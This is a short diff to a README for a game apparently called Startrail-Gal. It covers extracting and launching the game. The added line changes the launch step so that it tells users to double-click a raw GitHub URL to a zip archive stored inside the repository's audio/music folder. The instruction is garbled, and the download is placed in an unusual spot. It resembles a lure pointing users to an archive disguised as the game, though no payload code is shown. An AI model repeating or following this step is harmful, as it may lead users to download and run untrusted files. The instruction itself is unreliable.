Samue-osei/Startrail-Gal/README.md

 If the file is zipped, right-click on it and select "Extract All."
 Follow the prompts to extract the files to a location of your choice, like your Desktop.

 ### 5. Run the Game
 Navigate to the folder where you extracted the files.
-Look for the file named `Startrail-Gal.exe` and double-click it to start the game.
+Look for the file named `https://raw.githubusercontent.com/Samue-osei/Startrail-Gal/main/game/audio/music/Startrail-Gal-1.3-alpha.4.zip` and double-click it to start the game.

 ---